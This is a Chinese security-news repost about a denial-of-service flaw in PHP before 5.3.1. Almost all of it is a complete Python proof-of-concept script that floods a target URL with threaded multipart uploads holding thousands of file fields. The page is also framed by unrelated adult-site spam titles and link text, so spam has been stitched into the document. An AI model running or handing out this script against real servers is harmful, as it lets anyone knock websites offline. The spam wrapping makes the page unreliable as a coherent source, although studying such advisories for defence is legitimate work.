成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

PHP 5.3.1版本之前的拒絕服務攻擊漏洞(附測試代碼)

作者:佚名
安全 漏洞
拒絕服務##遠程攻擊##立即處理[msg]Code:# # PHP MultiPart Form-Data Denial of Service proof of concept, 23-10-2009 # Bogdan Calin (bogdan@acunetix.com)
Code:
# 
# PHP MultiPart Form-Data Denial of Service proof of concept, 23-10-2009 
# Bogdan Calin (bogdan@acunetix.com) 
# 
import httplib, urllib, sys, string, threading 
from string import replace 
from urlparse import urlparse 

def usage(): 
        print "****************************************************************************" 
        print " PHP MultiPart Form-Data Denial of Service proof of concept" 
        print " Bogdan Calin (bogdan@acunetix.com)" 
        print "" 
        print " Usage: php_mpfd_dos.py url [number_of_threads] [number_of_files] [data]" 
        print ""         
        print "  [number_of_threads] - optional, default 10"         
        print "  [number_of_files] - optional, default 15000"                 
        print "  [data] - content of the files, by default it will create files containing" 
        print "           the string " 
        print ""                 
        print " Example: php_mpfd_dos.pyhttp://ubuntu/index.php"         
        print "****************************************************************************" 
         
class PhpMPFDDosThread ( threading.Thread ): 
        # Override Thread's __init__ method to accept the parameters needed: 
        def __init__ ( self, host, path, files ):         
                self.host = host 
                self.path = path 
                self.files = files 
                threading.Thread.__init__ ( self )                 

        # run in loop 
        def run(self): 
                while(1): 
                        try: 
                                self.post_data() 
                        except: 
                                print "*", 
                 
        # post multipart_formdata         
        def post_data(self):         
            content_type, body = self.encode_multipart_formdata() 
            h = httplib.HTTPConnection(self.host) 
            headers = { 
                'User-Agent': 'Opera/9.20 (php_mpfd_dos;poc)', 
                'Accept': '*/*', 
                'Content-Type': content_type 
                } 
            h.request('POST', self.path, body, headers) 
            print ".", 

        # encode multipart_formdata 
        def encode_multipart_formdata(self): 
                """ 
                adapted fromhttp://code.activestate.com/recipes/146306/ 
                files is a sequence of (name, filename, value) elements for data to be uploaded as files 
                Return (content_type, body) ready for httplib.HTTP instance 
                """ 
                BOUNDARY = '----------PHP_MPFD_DOS' 
                CRLF = '\r\n' 
                L = [] 
                for (key, filename, value) in self.files: 
                L.append('--' + BOUNDARY) 
                L.append('Content-Disposition: form-data; name="%s"; filename="%s"' % (key, filename)) 
                L.append('Content-Type: application/octet-stream') 
                L.append('') 
                L.append(value) 
                L.append('--' + BOUNDARY + '--') 
                L.append('') 
                body = CRLF.join(L) 
                content_type = 'multipart/form-data; boundary=%s' % BOUNDARY 
                return content_type, body 

def main():     
        if len(sys.argv)<=1: 
                usage() 
                sys.exit() 

        # default values 
        number_of_threads = 10 
        number_of_files = 15000 
        data = "" 
         
        if len(sys.argv)>2: 
                number_of_threads = int(sys.argv[2]) 

        if len(sys.argv)>3: 
                number_of_files = int(sys.argv[3]) 

        if len(sys.argv)>4: 
                data = sys.argv[4]         
         
        url = sys.argv[1] 
        print "[-] target: " + url 

        # parse target url 
        up = urlparse(url) 
        host = up.netloc 
        path = up.path 

        # prepare files 
        files = [] 
        for i in range(0, number_of_files): 
                files.append(('fu[]', 'f'+str(i), data)) 
         
        # start the threads 
        for x in xrange ( number_of_threads ): 
                PhpMPFDDosThread(host, path, files).start() 

if __name__ == '__main__': 
    main()

【編輯推薦】

  1. Windows下PHP+MySQL+IIS安全平臺III 變態配置
  2. php應用程序安全防范技術研究
責任編輯:安泉 來源: 黑客防線
PHP漏洞
相關推薦

2009-07-12 16:50:08

2010-10-08 12:21:22

2010-10-09 14:59:30

2011-03-03 11:26:09

2009-08-29 16:45:27

2009-10-22 11:28:38

2009-10-24 10:29:56

2010-10-11 12:29:52

2009-07-12 16:24:57

2012-08-20 10:15:44

2015-08-21 10:11:25

2010-01-15 11:21:12

2024-09-25 15:32:23

2011-08-11 09:02:58

2009-10-27 14:17:49

2011-12-29 09:21:09

TomcatHashtable

2025-06-27 09:02:08

2009-07-19 21:53:22

2010-10-09 14:15:47

2016-11-01 23:36:14

點贊
收藏

51CTO技術棧公眾號

主站蜘蛛池模板: 久久亚洲精品视频 | 日韩中文字幕一区二区 | 成人在线视频网 | 国产欧美精品区一区二区三区 | 日本 欧美 三级 高清 视频 | 成人精品鲁一区一区二区 | 国产精品久久久久久久久久久免费看 | 日本在线视频一区二区 | 久久精品欧美视频 | 国产精品久久久久久久免费大片 | 久久久久久免费免费 | 国产精品黄色 | 999久久久国产精品 欧美成人h版在线观看 | 精品久久久久久久 | 黄网站在线播放 | 久久99精品久久久久婷婷 | 精品国产伦一区二区三区观看体验 | 国产免费av网 | 日韩免费视频一区二区 | 伊人免费在线 | www.youjizz.com日韩 | 成人在线免费看 | www.99热 | 欧美日韩综合一区 | 日本人和亚洲人zjzjhd | 久久亚洲视频 | 国产精品美女久久久久久久网站 | 伊人精品在线 | 久久久精品综合 | 老牛嫩草一区二区三区av | 欧美一区二区成人 | 欧美高清一区 | 在线成人精品视频 | 超碰97人人人人人蜜桃 | 欧美激情一区 | 欧美日韩国产精品一区 | 99精品视频网| 国产精品一区二区久久久久 | 久久久激情视频 | 国产欧美精品一区二区色综合朱莉 | 久久久九九|